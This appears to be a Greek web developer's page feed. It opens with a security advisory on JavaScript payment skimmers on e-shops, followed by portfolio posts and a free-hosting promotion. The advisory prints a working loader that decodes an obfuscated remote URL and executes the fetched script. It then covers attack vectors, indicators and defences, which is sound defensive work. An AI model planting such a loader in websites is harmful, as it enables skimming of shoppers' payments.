SimTech

12/02/2026

⚠️Σημαντική Ενημέρωση Ασφαλείας – Malware τύπου Skimmer

Τις τελευταίες εβδομάδες παρατηρείται αυξημένη εμφάνιση malware τύπου skimmer βασισμένου σε JavaScript σε παραγωγικά περιβάλλοντα ηλεκτρονικών καταστημάτων (WordPress, custom PHP, Laravel κ.λπ.).

Το κακόβουλο λογισμικό εισάγεται μέσω script injection και στοχεύει άμεσα τις φόρμες και τα κουμπιά πληρωμών, αλλοιώνοντας τη ροή των συναλλαγών και ανακατευθύνοντάς τες σε υποδομές των επιτιθέμενων.

Δείγμα Κακόβουλου Κώδικα (Observed Payload):


(function(){
var x = new XMLHttpRequest;
x.open('GET', atob('aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz'));
x.onload = function(){
if (x.status === 200) {
try { Function(x.responseText)(); } catch(e){}
}
};
x.send();
})();


Τεχνική Ανάλυση

‣ Χρήση atob() για απόκρυψη (obfuscation) του απομακρυσμένου endpoint (μεταβαλόμενο)

‣ Δυναμική φόρτωση εξωτερικού JavaScript payload

‣ Εκτέλεση κώδικα μέσω Function() (runtime ex*****on)

‣ Παράκαμψη απλών static scanners

Εκτέλεση αποκλειστικά client‑side, χωρίς καταγραφή σε server logs

Vector Επίθεσης

Συνήθεις τρόποι εισαγωγής:

‣ Παραβιασμένα plugins ή themes

‣ Μη ασφαλή δικαιώματα αρχείων

‣ Εκτεθειμένα ή αδύναμα admin credentials

‣ Άμεσο JavaScript injection στη βάση δεδομένων

‣ Τροποποιημένα template αρχεία (header.php, footer.php, checkout views)

Επιπτώσεις

‣ Παραποίηση φορμών και κουμπιών πληρωμών

‣ Ανακατεύθυνση ή αλλοίωση payment requests

‣ Οι πληρωμές καταλήγουν σε endpoints των επιτιθέμενων

‣ Καμία εμφανής αλλαγή στο UI για τον τελικό χρήστη

‣ Υψηλός κίνδυνος chargebacks, παραβίασης PCI και blacklisting

Indicators of Compromise (IoCs)

‣ Άγνωστα tags σε templates ή βάση δεδομένων

‣ Base64‑encoded URLs

‣ Εξωτερικά JavaScript calls σε άγνωστα domains

‣ Injected JS σε checkout / cart σελίδες

‣ Αλλαγές αρχείων χωρίς αντίστοιχο deployment

Άμεσες Ενέργειες

Επίπεδο Εφαρμογής

‣ Πλήρης έλεγχος template και JS αρχείων

‣ Έλεγχος βάσης δεδομένων για injected scripts

‣ Επιβεβαίωση ακεραιότητας core αρχείων

‣ Αφαίρεση όλων των άγνωστων scripts

‣ Re‑deploy από καθαρό source

Πρόσβαση & Credentials

‣ Reset όλων των admin / FTP / SSH / DB κωδικών

‣ Έλεγχος χρηστών και δικαιωμάτων

‣ Απενεργοποίηση ανενεργών λογαριασμών

Server / Hosting

‣ Ενεργοποίηση WAF κανόνων (JS injection / XSS / skimmer)

‣ File integrity monitoring

‣ Έλεγχος outbound traffic

‣ Περιορισμός inline script ex*****on όπου είναι δυνατό

‣ Εφαρμογή CSP headers

Πρόληψη

‣ Αυστηρό Content Security Policy (CSP)

‣ Read‑only filesystem όπου είναι εφικτό

‣ Διαχωρισμός staging / production

‣ Καμία απευθείας αλλαγή σε production

‣ Συνεχές monitoring και alerting

‣ Τακτικοί έλεγχοι ασφαλείας

Σοβαρότητα

Critical🚨 – Υψηλός οικονομικός κίνδυνος και κίνδυνος ακεραιότητας δεδομένων.

Συνιστάται άμεση αντιμετώπιση σε κάθε περιβάλλον που διαχειρίζεται πληρωμές.

Επαγγελματική κατασκευή ιστοσελίδων, e-shop και web εφαρμογών. Full stack development με Next.js, React και σύγχρονες τεχνολογίες.

31/12/2025

19/12/2025

✨ Νέα ανάπτυξη Ιστοσελίδας – RealEstateMichaels✨

Με περηφάνια παρουσιάζω την ολοκληρωμένη πλατφόρμα ακινήτων στην Κεφαλονιά, σχεδιασμένη και υλοποιημένη με στόχο να προσφέρει premium εμπειρία χρήστη και αξιοπιστία από την πρώτη επίσκεψη.

🔹 Καθαρή δομή περιεχομένου – κατηγορίες για κατοικίες, οικοπέδα και επαγγελματικά με σαφή στοιχεία (τετραγωνικά, δωμάτια, τιμές)

🔹 Compare listings – side‑by‑side αξιολόγηση επιλογών για εύκολες αποφάσεις

🔹 Άμεση επικοινωνία – ορατά στοιχεία του γραφείου στο Αργοστόλι για εμπιστοσύνη και προσβασιμότητα

🔹 Multilingual‑ready εμπειρία – επιλογή γλώσσας για διεθνείς επισκέπτες και επενδυτές

🔹 Premium branding – minimal τυπογραφία, καθαρές ετικέτες και προσεγμένες κάρτες ακινήτων

Το RealEstateMichaels είναι μια γρήγορη και λειτουργική πλατφόρμα που αναδεικνύει την Κεφαλονιά ως προορισμό επενδύσεων και κατοικίας, με έμφαση στη σαφήνεια, την αξιοπιστία και την premium εμπειρία.

Το realeastemichaels.gr είναι μια σύγχρονη πλατφόρμα real estate που σχεδιάστηκε και αναπτύχθηκε με στόχο να προσφέρει μια premium εμπειρία στους χρήστες που αναζητούν ακίνητα στην ...

29/10/2025

🆕 Ήρθε το ZeroHost — η νέα hosting λύση που αξίζει την προσοχή σου!

Είμαι περήφανος να σας παρουσιάσω το ZeroHost.gr — μια νέα freemium υπηρεσία web hosting από την NetSpace.gr, διαθέσιμη εντελώς ΔΩΡΕΑΝ για όλους!

💻 Τι προσφέρει το ZeroHost;
✔️ 800MB χώρο
✔️ 1 domain ή subdomain
✔️ AutoSSL & File Manager
✔️ Softaculous Installer
✔️ cPanel με LiteSpeed
✔️ Ελληνικό Datacenter για κορυφαία ταχύτητα
✔️ Ιδανικό για developers, startups & μικρές επιχειρήσεις

🎯 Ξεκίνα σήμερα χωρίς κόστος και με υποστήριξη από ελληνική εταιρεία με εμπειρία από το 2007!

🔗 Μάθε περισσότερα: https://zerohost.gr

👏 Συγχαρητήρια στον συνεργάτη μου για αυτή την εξαιρετική πρωτοβουλία! Υποστηρίζουμε ελληνικές λύσεις με ποιότητα και όραμα.

🚨Το ZeroHost.gr προσφέρεται αποκλειστικά για νόμιμες και επαληθεύσιμες χρήσεις. Ιστοσελίδες που περιέχουν παράνομο περιεχόμενο (π.χ. warez, phishing, adult χωρίς άδεια, παραβίαση πνευματικών δικαιωμάτων), καθώς και ιστότοποι επιχειρήσεων χωρίς καταχώρηση στο Γ.Ε.Μ.Η ή με μη έγκυρα στοιχεία, θα διαγράφονται άμεσα και χωρίς καμία προειδοποίηση. Η υποδομή παρακολουθείται ενεργά για abuse patterns και εφαρμόζονται πολιτικές auto-suspend & purge σε περιπτώσεις παραβίασης. Δεν παρέχεται περίοδος χάριτος ή δυνατότητα επαναφοράς σε σοβαρές παραβάσεις.

Δωρεάν ελληνικό hosting με cPanel, LiteSpeed, SSL & Softaculous. Δικό σου domain ή δωρεάν subdomain. Αναβάθμιση χωρίς migration.

25/10/2025

✅ Ολοκληρώθηκε το δεύτερο στάδιο του eshop otheiosangelos.gr!! Με νέο custom σχεδιασμό, αυτοματοποιημένο newsletter και SEO βελτιστοποιήσεις, το κατάστημα είναι πλέον πιο γρήγορο, πιο έξυπνο και πιο έτοιμο για οργανική ανάπτυξη. Η εξέλιξη συνεχίζεται με επόμενο στόχο την πλήρη αυτοματοποίηση και την επιχειρησιακή ευελιξία.

📍 Ο θείος Άγγελος-Pop Culture shop

Υπηρεσίες Web Design Web Development Επισκεφθείτε το live 🛠️ Πρώτο Στάδιο ΕργασιώνΜε ιδιαίτερη χαρά ολοκλήρωσα την πρώτη φάση των βελτιώσεων στο ηλεκτρονικό κατάστημα otheiosangelo...

23/08/2025

Custom e-Shop Ανάπτυξη: theotokatos.gr

Το theotokatos.gr είναι ένα ηλεκτρονικό κατάστημα που ανέπτυξα με σκοπό να υποστηρίζει τη δημιουργία προσφορών αντί για άμεσες online αγορές. Ανταποκρίνεται σε πραγματικές εμπορικές ανάγκες, προσφέροντας μια έξυπνη εναλλακτική στη συμβατική λειτουργία e-shop.

📌 Βασικές λειτουργίες που υλοποίησα:
Επιλογή προϊόντων από τον χρήστη και σύνθεση αιτήματος προσφοράς.
Δυνατότητα δημιουργίας λογαριασμού για παρακολούθηση της εξέλιξης της προσφοράς.
Αυτόματη δημιουργία προσφοράς σε μορφή PDF και αποστολή στον πελάτη μέσω email.

Υλοποίηση back-office εργαλείων ώστε ο πωλητής με ένα κλικ να:
-Στείλει το PDF της προσφοράς μέσω email
-Το κατεβάσει τοπικά για offline χρήση
Διαχειριστικό σύστημα με έμφαση στην απλότητα και την αποδοτικότητα.
🔧 Τεχνολογίες & Μεθοδολογία:
Responsive custom frontend development
PDF generation pipeline
Λογική ροής eQuote αντί eCommerce
Εστίαση στην ευχρηστία για πελάτες και διαχειριστές

Το συγκεκριμένο project παρουσιάζει τη φιλοσοφία μου στην κατασκευή web εφαρμογών, απλότητα, λειτουργικότητα και προστιθέμενη αξία για τον τελικό χρήστη.

Το theotokatos.gr είναι ένα ηλεκτρονικό κατάστημα που ανέπτυξα, με σκοπό να υποστηρίζει τη δημιουργία προσφορών αντί για άμεσες online αγορές. Ανταποκρίνεται σε πραγματικές...

13/04/2025

13/04/2025

10/04/2025

🌟 Νέα ανάπτυξη ψηφιακών λύσεων από την Sim-Tech 🌟

Με χαρά σας παρουσιάζω τη νέα μου ανάπτυξη ιστοσελίδας ✨Caretta holiday

💻 Σύστημα κρατήσεων(booking engine) και Channel Manager: Το σύστημα κρατήσεων και Channel Manager που προσφέρω είναι πλήρως προσαρμόσιμο και μπορεί να ενσωματωθεί σε οποιαδήποτε ιστοσελίδα βασισμένη στο WordPress.
Είναι σχεδιασμένο για να καλύπτει τις ανάγκες τόσο των μικρομεσαίων επιχειρήσεων που θέλουν μια λειτουργική και οικονομικά αποδοτική λύση, όσο και των μεγάλων επιχειρήσεων, προσφέροντας πλήρη ευελιξία και επεκτασιμότητα. 🌐

Χαρακτηριστικά:

✅ Ενσωματωμένο σύστημα κρατήσεων που επιτρέπει στους χρήστες να ολοκληρώνουν τις κρατήσεις τους χωρίς να μεταφέρονται σε εξωτερικούς συνδέσμους.

✅ Το Channel Manager λειτουργεί τόσο για την διαχείριση καταλυμάτων στην ιστοσελίδα, όσο και μέσω εφαρμογής για κινητά, προσφέροντας ευκολία και προσβασιμότητα.

✅ Δυνατότητα διαχείρισης απεριόριστου αριθμού δωματίων και καταλυμάτων, χωρίς περιορισμούς.

✅ Λειτουργία ρεσεψιόν, που περιλαμβάνει τη διαχείριση διαδικασιών check-in και check-out, για την απόλυτη οργάνωση και εμπειρία φιλοξενίας.

✅ Σύνδεση με το myDATA, εξασφαλίζοντας τη συμμόρφωση με τα φορολογικά πρότυπα και την αυτοματοποίηση της διαχείρισης παραστατικών.

🌐 Δείτε την εφαρμογή αυτής της λύσης στο carettaholiday.com και ανακαλύψτε πώς μπορεί να μεταμορφώσει την εμπειρία κρατήσεων και διαχείρισης καταλυμάτων! 🔗

Η Sim-Tech είναι εδώ για να προσφέρει μοναδικές λύσεις που καλύπτουν τις ανάγκες κάθε πελάτη. 🚀✨

Η CarettaHoliday.com είναι ένα project που ανέπτυξα με σκοπό να παρέχω μια αποτελεσματική, μοντέρνα και πλήρως λειτουργική πλατφόρμα για κρατήσεις διαμονής. Ενσωματώνοντας τε....